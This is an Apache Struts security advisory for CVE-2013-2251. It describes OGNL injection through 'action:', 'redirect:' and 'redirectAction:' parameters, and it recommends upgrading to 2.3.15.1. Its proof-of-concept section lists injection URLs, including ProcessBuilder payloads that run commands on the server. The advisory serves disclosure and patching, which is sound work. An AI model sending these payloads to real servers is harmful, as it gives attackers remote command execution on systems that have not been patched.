Versions Compared

Old Version 5

changes.mady.by.user René Gielen

Saved on

compared with

New Version 6

changes.mady.by.user René Gielen

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.
Comment: Migrated to Confluence 4.0

Summary

Excerpt

A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution

Who should read this

All Struts 2 developers and users

Impact of vulnerability

Remote command execution

Maximum security rating

Highly Critical

Recommendation

Developers should immediately upgrade to Struts 2.3.15.1

Affected Software

Struts 2.0.0 - Struts 2.3.15

Reporter

Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE Identifier

CVE-2013-2251

Problem

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Proof of concept

In the Struts Blank App, open following URLs.

  1. Simple Expression - the parameter names are evaluated as OGNL.
    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{3*4}
    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
  1. Command Execution
    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
    3. Code Block
      http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Solution

DefaultActionMapper was changed to sanitize "action:"-prefixed information properly. The features involved with "redirect:"/"redirectAction:"-prefixed parameters were completely dropped - see also S2-017.

Warning

It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.